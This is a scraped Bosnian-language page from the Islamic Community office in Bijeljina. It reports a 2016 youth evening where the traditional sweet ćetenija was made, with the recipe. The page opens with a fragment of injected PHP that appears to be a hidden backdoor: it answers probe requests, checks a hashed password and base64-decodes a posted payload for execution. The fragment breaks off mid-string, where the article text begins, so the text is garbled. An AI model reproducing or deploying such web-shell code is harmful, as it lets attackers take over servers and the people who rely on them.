function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Bosanska tradicija - Ćetenija u Mektebskom centru u Bijeljini - FOTO GALERIJA - Medžlis Islamske zajednice Bijeljina

Bosanska tradicija – Ćetenija u Mektebskom centru u Bijeljini – FOTO GALERIJA

Bosanska tradicija – Ćetenija u Mektebskom centru u Bijeljini –  FOTO GALERIJA

U Mektebskom centru u Bijeljini, u srijedu 6. januara 2016. godine, održano je omladinsko sijelo i napravljena ćetenija, specijalitet bosanske kuhinje i tradicije, koji je u nekim krajevima BiH odavno zaboravljen. Glavni majstor bio je Omer ef. Camić, glavni imam MIZ Janja, a prvi asistent njegov brat Samir ef. Camić, glavni imam MIZ Bijeljina, od koga je i potekla ideja da se na ovakav način prepletu bosanska tradicija, sijelo, druženje, iskustvo i mladost i pravljenje ćetenije.

Kako kažu stručnjaci, za pravljenje ćetenije potreban je dobar zimski minus, ali te večeri temperatura zraka bila je iznad nule. Uprkos tome, ali i uprkos pomagačima amaterima, ćetenija se prilično dobro “ugodila”, a fino se i pojela, na zadovoljstvo svih prisutnih. Omer efendija obećao je još bolju ćeteniju, čim prilike budu odgovarajuće, a za većinu mladih ovo je bila novost i fino iskustvo.

bnc18

Ćetenija – Recept preuzet iz knjige Bosanski kuhar od Alije Lakšića, ali pravi majstori za ćeteniju uvijek imaju i svoje dodatke receptu.

bnc23

Potrebni sastojci

1 kg šećera, malo limuna, malo ulja, 1 kg brašna

Način pripreme

Dan prije sijela ispeče se brašno nasuho. Mora se peći na tihoj vatri i miješati da ne zagori. Kada se ispeče, brašno se ostavi i ohladi.

Na sijelu se dobro ušpinuje šećer uz dodatak vode i malo limunova soka, te pusti da se ohladi. Kada se šećer ohladio (stvrdnuo), u sobi na sijelu se počinje spravljati ćetenija. Soba ne smije biti pretopla. Rukama namašćenim uljem podigne se iz posude u jednom komadu ohlađeni šećer, te valjajući ga među dlanovima oblikuje valjak, pa se i dalje “radi” i presavija dok ne pobijeli, a zatim se od njega napravi kolo (obruč, prsten).

Zatim se postavi sofra (sinija, demirlija, sto) i na sofri razastre pečeno brašno. Kolo (šećerno, ćetenija) se stavi na sredinu sofre i opet dobro sastavi da se ne bi u toku rada rastavljalo. Okolo sofre se okupi 5-6, obično djevojaka koje ce izrađivati ćeteniju. Kolo se pomalo posipa brašnom i okreću ga na sofri, stiskaju i okreću. Kada se neko umori okrečući, zamjenjuje ga drugi. Tako se kolo okreće sve dok se ne počne končati. Kada se ćetenija počne sama končati, dodaje se pomalo brašna, ali ne previše, te dalje okreče dok se potpuno ne iskonča. Ako u ćeteniji ima gutica, znači nije dobro iskončana.

Iskončana ćetenija izreže se na patke (komade dužine oko 15 cm i širine oko 10 cm), te servira na tanjiriće.